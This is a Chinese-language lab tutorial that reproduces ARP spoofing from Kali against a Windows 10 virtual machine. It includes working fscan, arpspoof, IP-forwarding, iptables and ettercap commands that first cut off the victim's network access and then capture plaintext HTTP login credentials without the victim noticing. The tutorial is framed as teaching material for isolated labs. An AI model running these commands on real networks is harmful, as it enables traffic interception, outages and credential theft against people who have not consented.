当前位置: 首页 > news >正文

kali复现arp欺骗

利用kali复现arp欺骗

本实验旨在帮助学习者理解 ARP 协议工作机制 以及 常见的ARP欺骗攻击原理与防护方法,仅限于 教学和实验环境 使用。实验过程中可能涉及到网络抓包、ARP表修改、ARP欺骗等操作,这些操作在实际生产环境或公共网络中使用可能会对他人网络造成干扰或破坏。

复现步骤

开启两台机器:kali、windows10

image-20250926153041601

确保两个机器是同一个网卡,默认都是nat的vmnet8

查看kali的IP地址(后面用fscan探测的就是kali所在的网络):

ip a

image-20250926153350151

kali查看网络的网关:

route -n

image-20250926153455810

kali利用fscan发现windows主机IP地址:

./FScan_2.0.1_linux_x64 -h kali所在的网段
./FScan_2.0.1_linux_x64 -h 192.168.198.0/24

image-20250926153207923

image-20250926153551378

发现windows10主机的IP地址

所以目前得到的信息是:

+ kali攻击机:192.168.198.130
+ Windows受害主机:192.168.198.129
+ 网关:19.168.198.2

断网攻击

kali执行:

sudo arpspoof -i kali查看网络信息时候的网卡 -t 受害者IP地址 伪装成的IP地址(网关)
sudo arpspoof -i eth0 -t 192.168.198.129 192.168.198.2# 注意sudo需要root的密码,也就是kali,并且输入密码不会显示出来,输入后直接回车就好了

image-20250926154334900

Windows查看arp表:

arp -a

发现网关的mac地址和kali的mac地址一样,攻击成功

image-20250926154359100

windows随便访问一个网站都是失败的:

image-20250926155029663

kali执行arpspoof的终端按ctrl+C可以停止攻击

image-20250926154722372

windows恢复正常

image-20250926154734501

可以访问互联网:

image-20250926155051391

抓取http明文信息(受害机器无感)

kali需要开启IP转发功能

sudo su
# 输入kali回车echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -A FORWARD -i eth0 -o eth0 -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

image-20250926155353565

kali执行arp攻击

arpspoof -i 网卡名 -t 受害者IP地址 -r 网关地址
arpspoof -i eth0 -t 192.168.198.129 -r 192.168.198.2

image-20250926155407682

windows查看arp:

image-20250926155427515

攻击成功,观察是否可以上网:

image-20250926155456875

可以上网

kali新开一个终端运行:

sudo su
# 输入kali回车ettercap -Tq -i 网卡名
ettercap -Tq -i eth0

image-20250926155643819

受害windows访问:

http://a.aixjt.com/AdminPublic.html

实验过程中如果发现windows又断网了,需要你重新上面的ip转发的操作就可以

image-20250926155936853

随便输入账号密码之后登录,回到kali运行ettercap的终端:

image-20250926160023565

发现了受害者输入的账号密码

本实验旨在帮助学习者理解 ARP 协议工作机制 以及 常见的ARP欺骗攻击原理与防护方法,仅限于 教学和实验环境 使用。实验过程中可能涉及到网络抓包、ARP表修改、ARP欺骗等操作,这些操作在实际生产环境或公共网络中使用可能会对他人网络造成干扰或破坏。

http://www.hskmm.com/?act=detail&tid=18083

相关文章:

  • VGGT: Visual Geometry Grounded Transformer
  • 嵌入式入门,基于keil5用stm32寄存器和标准库实现LED流水灯
  • AI agent编程随记
  • 小人鱼的数学题 - Li
  • 再见 Claude Code!玩转 CodeX CLI 的 16 个实用小技巧,效率拉满!!
  • 【IEEE出版】第五届电气工程与机电一体化技术国际学术会议(ICEEMT 2025)
  • [新教程] Linux服务器使用fail2ban防止远程恶意连接
  • PowerMill 2026安装包下载与Autodesk Powermill2026安装教程
  • [新教程] Linux服务器修改ssh服务端口
  • 《嵌入式驱动(二):驱动编写基本概念》
  • 一站式电竞平台解决方案:数据、直播、源码,助力业务飞速启航 - 数据服务
  • nfs故障排查
  • 数字信封
  • 程序员的内容创作利器:深度解析小红书爆款笔记生成提示词
  • Unigine整合Myra UI Library全纪录(2):渲染
  • 元人文AI:为价值创新构筑“舞台”、订立“契约”、预演“未来”
  • 设计一个关于python的if 语句的练习题
  • 基于CSMA/CA协议的V2X通信MATLAB仿真
  • 【招聘专场】想斩获高含金量名企Offer?京东、微芯研究院等企业 软件测试开发岗,虚位以待!
  • 练习题:成绩评定系统
  • Day22方法重写
  • python调试方法:验证安装路径与路径配置
  • CentOS将软件源修改为国内源
  • 【C++进阶】C++11 的新特性 | lambda | 包装器 - 实践
  • orcad放置器件时器件不在预览框中心
  • 易路一站式智能招聘,开启人才管理新纪元
  • kingbase数据库SHELL端迁移工具访问及使用
  • 数据质量定胜负:Apple 如何破解双语大模型性能鸿沟
  • 从零开始:VirtualBox 虚拟机安装与 CentOS 7 部署 + 双网卡网络配置指南
  • 微信个人号api|搭建高效微信机器人系统